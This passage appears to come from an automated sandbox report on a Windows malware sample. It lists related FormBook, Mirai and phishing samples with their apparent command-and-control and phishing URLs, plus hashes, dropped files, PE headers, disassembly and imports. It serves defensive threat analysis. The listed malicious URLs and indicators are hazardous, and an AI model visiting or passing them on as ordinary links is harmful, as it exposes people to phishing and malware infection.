	file.exe	Get hash	malicious	AgentTesla, FormBook	Browse	www.frogair.online/czni/?8ILHe=fwV5A&Bqhu_=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb62gLk0/ZBI+NdPw==
	mt103.js	Get hash	malicious	FormBook	Browse	www.frogair.online/crhz/?vG=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&s91Fd8=b8xjX_
	0900664 MOHS Tender..js	Get hash	malicious	FormBook	Browse	www.frogair.online/czni/?20=4xfPiv3RnE&z8rul-n=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb3kyjT9rM2PcJgOg==
	file.exe	Get hash	malicious	FormBook	Browse	www.frogair.online/crhz/?Mkn=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJDQAP7ZwMaqvgwrA==&vux=DmStydFUWc8HD
	DHL Shipment doc.exe	Get hash	malicious	FormBook	Browse	www.solatopotato.com/how6/?W6vtR=4EPEhjHsb2zicvYNP8lD0qzrINMa8IRsv4Cq+fHosD6XE0pK2EAVk/7C/sJ+vhveOIRa&pN6=9ri0dbnPLFLdd
103.249.106.91	MN1qo2qaJmEvXDP.exe	Get hash	malicious	FormBook	Browse	www.6822662.xyz/dnjw/
	SRT68.exe	Get hash	malicious	FormBook	Browse	www.8600228.xyz/1aqh/
	Documents.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.6822662.xyz/dnjw/
	RO2Y11yOJ7.exe	Get hash	malicious	FormBook	Browse	www.7153115.xyz/dblf/
	PR. No.1599-Rev.2.exe	Get hash	malicious	Unknown	Browse	www.7373995.xyz/49mm/
	COMMERCIAL INVOICES.exe	Get hash	malicious	FormBook	Browse	www.5711337.xyz/886f/
	Mac Purchase Order PO102935.xls	Get hash	malicious	FormBook	Browse	www.2886080.xyz/weeg/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
STRATOSTRATOAGDE	https://dealercentre-motors.com/Renew?token=rd7KFGQiWHN5fdeW9xVetypjNX+7andTyaRPuAtpwL49FW9spsyAYu6kh0+Wtf9e6cMnzcEQYPWTOlNjS28UUWxZC+qryuqeliCImBydUuanDA6M7TisVBnU1PpRIBmoJhhW+vPQVQlFrAfSGIFu1w==&error=invalid_scope	Get hash	malicious	Phisher	Browse	81.169.145.68
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	85.214.228.140
	6.elf	Get hash	malicious	Unknown	Browse	85.214.82.87
	https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za	Get hash	malicious	HTMLPhisher	Browse	85.215.142.30
	236236236.elf	Get hash	malicious	Unknown	Browse	81.169.145.88
	bot.m68k.elf	Get hash	malicious	Mirai	Browse	85.215.233.4
	armv4l.elf	Get hash	malicious	Mirai	Browse	81.169.229.96
	home.mpsl.elf	Get hash	malicious	Gafgyt, Mirai	Browse	85.215.233.7
	Beschwerde-AutoKauf.vbs	Get hash	malicious	GuLoader, Remcos	Browse	81.169.145.163
	botx.arm6.elf	Get hash	malicious	Mirai	Browse	85.214.70.89
AMAZONEXPANSIONGB	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	http://www.lpb.gov.lr	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	3.33.155.121
	https://we.tl/t-fnebgmrnYQ	Get hash	malicious	Unknown	Browse	3.33.220.150
	http://www.singhs.lv	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	3.33.155.121
	http://www.jmclmedia.ph	Get hash	malicious	Unknown	Browse	3.33.148.61
	https://sanctionssearch.ofac.treas.gov	Get hash	malicious	Unknown	Browse	108.175.50.40
	https://enterprisefocus.benchurl.com/c/l?u=11FC0F0E&e=193CF6A&c=173A1E&&t=0&l=11D51F9C4&email=s8sR2EUS6pcTEMAyWZX%2BTfGL0c%2FIo%2Bud&seq=2	Get hash	malicious	Unknown	Browse	3.33.220.150
	http://cipassoitalia.it	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	3.33.155.121
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK	empsl.elf	Get hash	malicious	Mirai	Browse	156.253.18.31
	garm5.elf	Get hash	malicious	Mirai	Browse	156.253.18.68
	goarm7.elf	Get hash	malicious	Mirai	Browse	156.253.18.82
	earm7.elf	Get hash	malicious	Mirai	Browse	156.241.153.169
	earm5.elf	Get hash	malicious	Mirai	Browse	156.241.153.140
	nrsh4.elf	Get hash	malicious	Mirai	Browse	156.253.18.47
	miori.arm.elf	Get hash	malicious	Unknown	Browse	118.184.11.254
	miori.mpsl.elf	Get hash	malicious	Unknown	Browse	156.241.153.123
	eXIHsSYhOX.exe	Get hash	malicious	Unknown	Browse	103.97.176.69
	Hilix.ppc.elf	Get hash	malicious	Mirai	Browse	156.253.18.92

Process:	C:\Windows\SysWOW64\bitsadmin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Dalis

Download File

Process:	C:\Users\user\Desktop\WyGagXWAfb.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.994887061613988
Encrypted:	true
SSDEEP:	6144:0GW/O3taW/SK5ZMU6fRXx2cw5fwUUUwJH:0GJ3t9LMU6fRB2P5fwUG
MD5:	99197BC6C70EF5EB7EC3BBE3F34664A5
SHA1:	B305A14B6268F1A0ACE1E70FAEC6C3E6A660660C
SHA-256:	33A1BA6B113EA86C49644A7623B57B97F780209DFFA3347C523F6C8D5E1FFD30
SHA-512:	BA1F1236A43023CA833A80BCA6CA494A823F0CE0D51FB72EAE4DFE6A26A54E3FB47C69B5631C8C8D63A4A01F958F1CEFFF4FC44EFC802B51FBE9B1046560CB7B
Malicious:	false
Reputation:	low
Preview:	...41Z6Q3YR1..O1.PW1E432s6IPS442Z6Q7YR1DIO11PW1E43236IPS442Z.Q7Y\..GO.8.v.Dx..g^ #sDF]=D0Zy1P*' E.22.7A].ZXi..g._5R4.T_;`IO11PW1<5:..V..nTS.gV6.C...s/V.J..SU.,....TU.d8T1oQ#.O11PW1E4cw36.QR4.+.hQ7YR1DIO.1RV:D?32k2IPS442Z6QgJR1DYO11 S1E4s23&IPS642\6Q7YR1DOO11PW1E4C636KPS442Z4Qw.R1TIO!1PW1U43"36IPS4$2Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236I~'QLFZ6Q..V1DYO11.S1E$3236IPS442Z6Q7yR1$IO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IP

C:\Users\user\AppData\Local\Temp\autAA6A.tmp

Download File

Process:	C:\Users\user\Desktop\WyGagXWAfb.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.994887061613988
Encrypted:	true
SSDEEP:	6144:0GW/O3taW/SK5ZMU6fRXx2cw5fwUUUwJH:0GJ3t9LMU6fRB2P5fwUG
MD5:	99197BC6C70EF5EB7EC3BBE3F34664A5
SHA1:	B305A14B6268F1A0ACE1E70FAEC6C3E6A660660C
SHA-256:	33A1BA6B113EA86C49644A7623B57B97F780209DFFA3347C523F6C8D5E1FFD30
SHA-512:	BA1F1236A43023CA833A80BCA6CA494A823F0CE0D51FB72EAE4DFE6A26A54E3FB47C69B5631C8C8D63A4A01F958F1CEFFF4FC44EFC802B51FBE9B1046560CB7B
Malicious:	false
Reputation:	low
Preview:	...41Z6Q3YR1..O1.PW1E432s6IPS442Z6Q7YR1DIO11PW1E43236IPS442Z.Q7Y\..GO.8.v.Dx..g^ #sDF]=D0Zy1P*' E.22.7A].ZXi..g._5R4.T_;`IO11PW1<5:..V..nTS.gV6.C...s/V.J..SU.,....TU.d8T1oQ#.O11PW1E4cw36.QR4.+.hQ7YR1DIO.1RV:D?32k2IPS442Z6QgJR1DYO11 S1E4s23&IPS642\6Q7YR1DOO11PW1E4C636KPS442Z4Qw.R1TIO!1PW1U43"36IPS4$2Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236I~'QLFZ6Q..V1DYO11.S1E$3236IPS442Z6Q7yR1$IO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IPS442Z6Q7YR1DIO11PW1E43236IP

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.167939704774002
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	WyGagXWAfb.exe
File size:	1'210'368 bytes
MD5:	6b53e14ca62426ef8a60d4a62a16a12b
SHA1:	c1f76d7381f85f03d3ffce11ce6cb6ef9d225d38
SHA256:	0c9998720cc90e23ce1bd5b4f7ed512316027625ccea7eca9722a32557a54adb
SHA512:	629e1cb6a2e747f87f0d5a9d2628f39eaae39aa207b80873aaaf5cfbe58c70c188333e919547de5735b47bf5269c9e440b11a2cb58a995711dd7eaf58eae1bb1
SSDEEP:	24576:7AHnh+eWsN3skA4RV1Hom2KXMmHarxJQRJDOj5o9OxvOS0TQ5:Wh+ZkldoPK8YarxJQRoq9OxmS0y
TLSH:	C545BE0273D1C036FFABA2739B6AF60556BC79254123852F13981DB9BC701B2663E763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675FA15C [Mon Dec 16 03:41:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F3C9052FEDDh
jmp 00007F3C90522C94h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F3C90522E1Ah
cmp edi, eax
jc 00007F3C9052317Eh
bt dword ptr [004C41FCh], 01h
jnc 00007F3C90522E19h
rep movsb
jmp 00007F3C9052312Ch
cmp ecx, 00000080h
jc 00007F3C90522FE4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F3C90522E20h
bt dword ptr [004BF324h], 01h
jc 00007F3C905232F0h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F3C90522FBDh
test edi, 00000003h
jne 00007F3C90522FCEh
test esi, 00000003h
jne 00007F3C90522FADh
bt edi, 02h
jnc 00007F3C90522E1Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F3C90522E23h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F3C90522E75h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x5d1b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x126000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x5d1b8	0x5d200	fc7d3171a154fc5695c2b556b68e283e	False	0.9318241401006712	data	7.903286598492405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x126000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc84a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc85c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc88b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc89d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccc38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcdce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xce148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xce6dc	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xced68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcf7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcfe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd02b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd0410	0x5484f	data			1.0003350751463786
RT_GROUP_ICON	0x124c60	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x124cd8	0x14	data	English	Great Britain	1.15
RT_VERSION	0x124cec	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x124dc8	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
